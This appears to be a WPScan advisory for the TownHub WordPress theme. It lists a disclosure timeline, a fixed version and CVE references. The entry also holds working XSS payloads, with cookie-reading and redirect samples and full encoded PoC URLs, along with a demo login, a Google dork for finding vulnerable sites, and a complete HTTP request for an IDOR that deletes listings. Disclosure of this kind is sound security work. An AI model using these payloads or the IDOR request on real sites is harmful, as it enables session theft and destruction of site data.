TownHub < 1.0.6 - Multiple Vulnerabilities



Description
Multiple vulnerabilities was discovered in the «TownHub - Directory & Listing WordPress Theme», tested version — v1.0.2:

- Unauthenticated XSS
- Authenticated Persistent XSS
- IDOR

Edit (WPScanTeam):
December 27h, 2019 - Envato Contacted
January 5th, 2020 - Envato Investigating
January 6th, 2020 - v1.0.6 released
Proof of Concept
----[]- Info: -[]----
Demo website: https://townhub.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://townhub.cththemes.com/dashboard/?dashboard=listings
Google Dork: /wp-content/themes/townhub/
Date: 27/12/2019


----[]- Reflected XSS: -[]----
Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Same thing with a regular search (block near website logo).

Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #1: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=


----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://townhub.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>


----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://townhub.cththemes.com/submit-listing/#/ (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Address», «Latitude (Drag marker on the map)», «Longitude (Drag marker on the map)», «Email Address», «Phone Number» and «Website». Payload inside «Address», «Latitude (Drag marker on the map)» and «Longitude (Drag marker on the map)» input fields also works on the admin dashboard, so it's possible to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- IDOR: -[]----
Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: townhub.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: https://townhub.cththemes.com
DNT: 1
Connection: close
Referer: https://townhub.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_cookies_here_
Pragma: no-cache
Cache-Control: no-cache

lid=XXXX&action=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).

Affects Theme

fixed in version 1.0.6

References

CVE 2019-20209
CVE 2019-20210
CVE 2019-20211
CVE 2019-20212
URL https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 127611
Verified Yes
WPVDB ID 10014

Timeline

Publicly Published 2020-01-09 (about 2 months ago)
Added 2020-01-09 (about 2 months ago)
Last Updated 2020-01-14 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin